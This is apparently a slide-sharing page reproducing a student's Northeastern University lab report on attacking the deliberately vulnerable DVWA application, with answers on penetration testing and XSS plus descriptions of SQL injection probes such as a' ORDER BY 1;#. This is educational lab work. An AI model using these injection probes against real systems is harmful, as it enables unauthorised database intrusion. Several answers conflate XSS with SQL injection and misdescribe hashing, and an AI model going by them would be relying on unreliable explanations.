CARMEN ALCIVAR, profile picture
Uploaded byCARMEN ALCIVAR
3,509 views

example of sql injection

Carmen Alcivar completed a lab assignment for her Foundations of Information Assurance course at Northeastern University. The assignment involved attacking a vulnerable web application and database. She performed tests like SQL injection and cross-site scripting attacks. Carmen provided screenshots and explanations of her results. She demonstrated techniques for discovering database structure and vulnerabilities. Overall, the assignment aimed to help Carmen learn how to identify security issues through penetration testing before software is deployed.

Embed presentation

Downloaded 22 times
<Carmen Alcivar> NORTHEASTERN UNIVERSITY 360 Huntington Ave, Boston, MA. LAB ASSIGNMENT 6 – FOUNDATIONS OF INFORMATION ASSURANCE (IA5010)
Contents Lab #15: Attacking a Vulnerable Web Application and Database ................................................2 a. Assessment Sheet........................................................................................................................2 b. Challenge Question.....................................................................................................................3 c. Screenshots: ................................................................................................................................3
Lab #15: Attacking a Vulnerable Web Application and Database a. Assessment Sheet Course Name and Number: Foundations of Information Assurance – IA5010 Student Name: <Carmen Alcivar> Instructor Name: Derek Brodeur Lab Due Date: <2/21/16> Lab Assessment Questions & Answers 1. Why is it critical to perform a penetration test on a Web application and a Web server prior to production implementation? Performing penetration tests on a Web application and a Web server prior to production implementation is a critical step in ensuring the confidentiality, integrity, and availability (CIA) of the Web application or service. It is imperative to perform penetration test in order to protect customer’s private information that will be entered via the Web application. There are also laws regulating the confidentiality of customer’s data. 2. What is a cross-site scripting attack? Explain in your own words? A cross-site scripting attack is the type of attack that exploit a cross-site scripting (XSS) vulnerability in a Website. It is subject to a SQL injection attack on the Web application's SQL database. XSS is the malicious insertion of scripting code to extract data or modify a Web site’s code, application, or content. 3. What is a reflective cross-site scripting attack? The reflective cross-site scripting attack is a non-persistent attack in which all input shows output on the user’s/attacker’s screen and does not modify data stored on the server. 4. Based on the tests you performed in this lab, which Web application attack is more likely to extract privacy data elements out of a database? The reflective cross-site scripting attack is the type of attacks that allows you to extract privacy data elements out of a database. 5. If you can monitor when SQL injections are performed on an SQL database, what would you recommend as a security countermeasure to monitor your production SQL databases? I would recommend the use of Simple Network Management Protocol (SNMP) alerts which allows Database administrators to monitor their SQL databases for unauthorized or abnormal SQL injections and write scripts for alarming as well as. Encrypting the data elements that reside in long-term storage of the SQL database is another option. 6. Given that Apache and Internet Information Services (IIS) are the two most popular Web application servers for Linux and Microsoft® Windows platforms, what would you do to identify known software vulnerabilities and exploits?
I could search the CVE listing using the keyword Apache to find all known Apache vulnerabilities and exploits. This allows to include all software patches and security patches on the production Web servers to remediate critical and major software vulnerabilities before the application is released. 7. What can you do to ensure that your organization incorporates penetration testing and Web application testing as part of its implementation procedures? Penetration testing should be part of the policy. The organization's security policy should dictate that no production Web application can be implemented without proper penetration testing and security hardening. 8. What is the purpose of setting the DVWA security level to “low” before beginning the remaining lab steps The low setting mimics a vulnerable Web application. Only a vulnerable system can be attacked. 9. As an ethical hacker, once you’ve determined that a database is injectable, what should you do with that information? As an ethical hacker, I should recommend specific countermeasures for remediating the vulnerabilities and eliminating the exploits. Once I have determined that a database is injectable b. Challenge Question c. Screenshots: Part 2: [Deliverable Lab Step 5] screen shot showing the exposed vulnerability
1. [Deliverable Lab Step 8] screen shot showing cross-site scripting attacks in the High setting. It does not go through.
Part 3: Step 6: screen shot displaying the result of the use the presence or lack of errors strategy to determine vulnerabilities. Review the output of this script (a' ORDER BY 1;# ). Here, I am trying to order the output by the first (1) column, or field. In this case, there is no error which means there is a first column. This allows to learn about the structure of the Database.
Step 7 screen shot displaying the result of the use the presence or lack of errors strategy to determine vulnerabilities. Review the output of this script (a' ORDER BY 2;#). Here, I am trying to order the output by the second (2) column, or field. In this case, there is no error which means there is a second column. Step 8: screen shot displaying the result of the use the presence or lack of errors strategy to determine vulnerabilities. Review the output of this script (a' ORDER BY 3;#). Here, I am trying to order the output by the third (3) column, or field. In this case, there is an error which means there is not a third column.
[Deliverable Lab Step 18]: a screen capture showing the user information for the user name that is currently being used to make queries on the server. [Deliverable Lab Step 20 ] a screen capture showing hash for the user to the backend database. Hashing in a database allows the creation of an index number. This facilitates the search of a record later on. http://www.webopedia.com/TERM/H/hashing.html
Part 4: [Deliverable Lab Step 8] screen capture showing the contents of the testing1.txt file

More Related Content

PDF
Auditing a Wireless Network and Planning for a Secure WLAN Implementation
byCARMEN ALCIVAR
 
PPTX
security misconfigurations
byMegha Sahu
 
PDF
Web Application Security and Awareness
byAbdul Rahman Sherzad
 
PDF
Social engineering attacks
byRamiro Cid
 
PPT
End User Security Awareness Presentation
byCristian Mihai
 
PPTX
Cybersecurity Awareness Session by Adam
byMohammed Adam
 
PDF
End-User Security Awareness
bySurya Bathulapalli
 
PPTX
Session Hijacking: Understanding and Preventing Online Attacks
byBoston Institute of Analytics
 
Auditing a Wireless Network and Planning for a Secure WLAN Implementation
byCARMEN ALCIVAR
 
security misconfigurations
byMegha Sahu
 
Web Application Security and Awareness
byAbdul Rahman Sherzad
 
Social engineering attacks
byRamiro Cid
 
End User Security Awareness Presentation
byCristian Mihai
 
Cybersecurity Awareness Session by Adam
byMohammed Adam
 
End-User Security Awareness
bySurya Bathulapalli
 
Session Hijacking: Understanding and Preventing Online Attacks
byBoston Institute of Analytics
 

What's hot

PPTX
Cybersecurity Attack Vectors: How to Protect Your Organization
byTriCorps Technologies
 
PPTX
Malware and Anti-Malware Seminar by Benny Czarny
byOPSWAT
 
PDF
Web application security & Testing
byDeepu S Nath
 
PPT
Building An Information Security Awareness Program
byBill Gardner
 
PPTX
OWASP Top 10 Proactive Controls
byKaty Anton
 
PPT
Malicious
byKhyati Rajput
 
PPTX
Ethical hacking
byVivek Mohbe
 
PPTX
Cyber Crime And Cyber Security
byPrashant Sharma
 
PPTX
Malware
byAnoushka Srivastava
 
ODP
OWASP Secure Coding
bybilcorry
 
PPT
Introduction to Web Application Penetration Testing
byAnurag Srivastava
 
PPT
Hacking web applications
byAdeel Javaid
 
PPTX
Man in the middle attack (mitm)
byHemal Joshi
 
PDF
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
byRob Ragan
 
PPTX
Knowbe4 presentation
byMd Mofijul Haque
 
PDF
CISSP 8 Domains.pdf
bydotco
 
PPTX
Phishing technology
byharpinderkaur123
 
PDF
How To Handle Cybersecurity Risk PowerPoint Presentation Slides
bySlideTeam
 
PPTX
Ethical Hacking
byBugRaptors
 
PPTX
Anti phishing presentation
byBokangMalunga
 
Cybersecurity Attack Vectors: How to Protect Your Organization
byTriCorps Technologies
 
Malware and Anti-Malware Seminar by Benny Czarny
byOPSWAT
 
Web application security & Testing
byDeepu S Nath
 
Building An Information Security Awareness Program
byBill Gardner
 
OWASP Top 10 Proactive Controls
byKaty Anton
 
Malicious
byKhyati Rajput
 
Ethical hacking
byVivek Mohbe
 
Cyber Crime And Cyber Security
byPrashant Sharma
 
Malware
byAnoushka Srivastava
 
OWASP Secure Coding
bybilcorry
 
Introduction to Web Application Penetration Testing
byAnurag Srivastava
 
Hacking web applications
byAdeel Javaid
 
Man in the middle attack (mitm)
byHemal Joshi
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
byRob Ragan
 
Knowbe4 presentation
byMd Mofijul Haque
 
CISSP 8 Domains.pdf
bydotco
 
Phishing technology
byharpinderkaur123
 
How To Handle Cybersecurity Risk PowerPoint Presentation Slides
bySlideTeam
 
Ethical Hacking
byBugRaptors
 
Anti phishing presentation
byBokangMalunga
 

Viewers also liked

PDF
encryption and hash algorithms
byCARMEN ALCIVAR
 
PDF
Packet capture and network traffic analysis
byCARMEN ALCIVAR
 
PDF
Examples of sql queries
byKishan Pant
 
PDF
Population Health - HEDIS - Health Plan
byCARMEN ALCIVAR
 
PDF
HL7 decoding _Alcivar_C
byCARMEN ALCIVAR
 
PPT
Oracle examples
byMaRwa Samih AL-Amri
 
encryption and hash algorithms
byCARMEN ALCIVAR
 
Packet capture and network traffic analysis
byCARMEN ALCIVAR
 
Examples of sql queries
byKishan Pant
 
Population Health - HEDIS - Health Plan
byCARMEN ALCIVAR
 
HL7 decoding _Alcivar_C
byCARMEN ALCIVAR
 
Oracle examples
byMaRwa Samih AL-Amri
 

Similar to example of sql injection

PDF
Web Application Penetration Testing
byPriyanka Aash
 
PDF
Common Web Application Attacks
byAhmed Sherif
 
PPTX
Vulnerabilities in modern web applications
byNiyas Nazar
 
PPTX
Identifying and Eradicating Web Application Vulnerabilities : Cyber Security ...
byBoston Institute of Analytics
 
PPTX
Solving Labs for Vulnerabilities: Login Bypass & SQL Injection Exploits
byBoston Institute of Analytics
 
PPTX
How to Test for The OWASP Top Ten
bySecurity Innovation
 
PDF
T04505103106
byIJERA Editor
 
PPTX
Cyber ppt
bykarthik menon
 
KEY
How to break web applications
byDinis Cruz
 
PPTX
State of the information security nation
bySensePost
 
PPT
Information security
bySathyanarayana Panduranga
 
PPTX
Web Application Security Session for Web Developers
byKrishna Srikanth Manda
 
PDF
IRJET - Web Vulnerability Scanner
byIRJET Journal
 
PPTX
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
byEric Vanderburg
 
PDF
Getting Inside Common Web Security Threats
byAndy Longshaw
 
KEY
EISA Considerations for Web Application Security
byLarry Ball
 
PPT
Get Ready for Web Application Security Testing
byAlan Kan
 
PPTX
OWASP top 10-2013
bytmd800
 
PDF
Web Applications Assessment Tools: Comparison and Discussion
byEECJOURNAL
 
PPTX
Attacks1
byAravindharamanan S
 
Web Application Penetration Testing
byPriyanka Aash
 
Common Web Application Attacks
byAhmed Sherif
 
Vulnerabilities in modern web applications
byNiyas Nazar
 
Identifying and Eradicating Web Application Vulnerabilities : Cyber Security ...
byBoston Institute of Analytics
 
Solving Labs for Vulnerabilities: Login Bypass & SQL Injection Exploits
byBoston Institute of Analytics
 
How to Test for The OWASP Top Ten
bySecurity Innovation
 
T04505103106
byIJERA Editor
 
Cyber ppt
bykarthik menon
 
How to break web applications
byDinis Cruz
 
State of the information security nation
bySensePost
 
Information security
bySathyanarayana Panduranga
 
Web Application Security Session for Web Developers
byKrishna Srikanth Manda
 
IRJET - Web Vulnerability Scanner
byIRJET Journal
 
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
byEric Vanderburg
 
Getting Inside Common Web Security Threats
byAndy Longshaw
 
EISA Considerations for Web Application Security
byLarry Ball
 
Get Ready for Web Application Security Testing
byAlan Kan
 
OWASP top 10-2013
bytmd800
 
Web Applications Assessment Tools: Comparison and Discussion
byEECJOURNAL
 
Attacks1
byAravindharamanan S
 

example of sql injection

  • 1.
    <Carmen Alcivar> NORTHEASTERN UNIVERSITY360 Huntington Ave, Boston, MA. LAB ASSIGNMENT 6 – FOUNDATIONS OF INFORMATION ASSURANCE (IA5010)
  • 2.
    Contents Lab #15: Attackinga Vulnerable Web Application and Database ................................................2 a. Assessment Sheet........................................................................................................................2 b. Challenge Question.....................................................................................................................3 c. Screenshots: ................................................................................................................................3
  • 3.
    Lab #15: Attackinga Vulnerable Web Application and Database a. Assessment Sheet Course Name and Number: Foundations of Information Assurance – IA5010 Student Name: <Carmen Alcivar> Instructor Name: Derek Brodeur Lab Due Date: <2/21/16> Lab Assessment Questions & Answers 1. Why is it critical to perform a penetration test on a Web application and a Web server prior to production implementation? Performing penetration tests on a Web application and a Web server prior to production implementation is a critical step in ensuring the confidentiality, integrity, and availability (CIA) of the Web application or service. It is imperative to perform penetration test in order to protect customer’s private information that will be entered via the Web application. There are also laws regulating the confidentiality of customer’s data. 2. What is a cross-site scripting attack? Explain in your own words? A cross-site scripting attack is the type of attack that exploit a cross-site scripting (XSS) vulnerability in a Website. It is subject to a SQL injection attack on the Web application's SQL database. XSS is the malicious insertion of scripting code to extract data or modify a Web site’s code, application, or content. 3. What is a reflective cross-site scripting attack? The reflective cross-site scripting attack is a non-persistent attack in which all input shows output on the user’s/attacker’s screen and does not modify data stored on the server. 4. Based on the tests you performed in this lab, which Web application attack is more likely to extract privacy data elements out of a database? The reflective cross-site scripting attack is the type of attacks that allows you to extract privacy data elements out of a database. 5. If you can monitor when SQL injections are performed on an SQL database, what would you recommend as a security countermeasure to monitor your production SQL databases? I would recommend the use of Simple Network Management Protocol (SNMP) alerts which allows Database administrators to monitor their SQL databases for unauthorized or abnormal SQL injections and write scripts for alarming as well as. Encrypting the data elements that reside in long-term storage of the SQL database is another option. 6. Given that Apache and Internet Information Services (IIS) are the two most popular Web application servers for Linux and Microsoft® Windows platforms, what would you do to identify known software vulnerabilities and exploits?
  • 4.
    I could searchthe CVE listing using the keyword Apache to find all known Apache vulnerabilities and exploits. This allows to include all software patches and security patches on the production Web servers to remediate critical and major software vulnerabilities before the application is released. 7. What can you do to ensure that your organization incorporates penetration testing and Web application testing as part of its implementation procedures? Penetration testing should be part of the policy. The organization's security policy should dictate that no production Web application can be implemented without proper penetration testing and security hardening. 8. What is the purpose of setting the DVWA security level to “low” before beginning the remaining lab steps The low setting mimics a vulnerable Web application. Only a vulnerable system can be attacked. 9. As an ethical hacker, once you’ve determined that a database is injectable, what should you do with that information? As an ethical hacker, I should recommend specific countermeasures for remediating the vulnerabilities and eliminating the exploits. Once I have determined that a database is injectable b. Challenge Question c. Screenshots: Part 2: [Deliverable Lab Step 5] screen shot showing the exposed vulnerability
  • 5.
    1. [Deliverable LabStep 8] screen shot showing cross-site scripting attacks in the High setting. It does not go through.
  • 6.
    Part 3: Step 6:screen shot displaying the result of the use the presence or lack of errors strategy to determine vulnerabilities. Review the output of this script (a' ORDER BY 1;# ). Here, I am trying to order the output by the first (1) column, or field. In this case, there is no error which means there is a first column. This allows to learn about the structure of the Database.
  • 7.
    Step 7 screenshot displaying the result of the use the presence or lack of errors strategy to determine vulnerabilities. Review the output of this script (a' ORDER BY 2;#). Here, I am trying to order the output by the second (2) column, or field. In this case, there is no error which means there is a second column. Step 8: screen shot displaying the result of the use the presence or lack of errors strategy to determine vulnerabilities. Review the output of this script (a' ORDER BY 3;#). Here, I am trying to order the output by the third (3) column, or field. In this case, there is an error which means there is not a third column.
  • 8.
    [Deliverable Lab Step18]: a screen capture showing the user information for the user name that is currently being used to make queries on the server. [Deliverable Lab Step 20 ] a screen capture showing hash for the user to the backend database. Hashing in a database allows the creation of an index number. This facilitates the search of a record later on. http://www.webopedia.com/TERM/H/hashing.html
  • 9.
    Part 4: [Deliverable LabStep 8] screen capture showing the contents of the testing1.txt file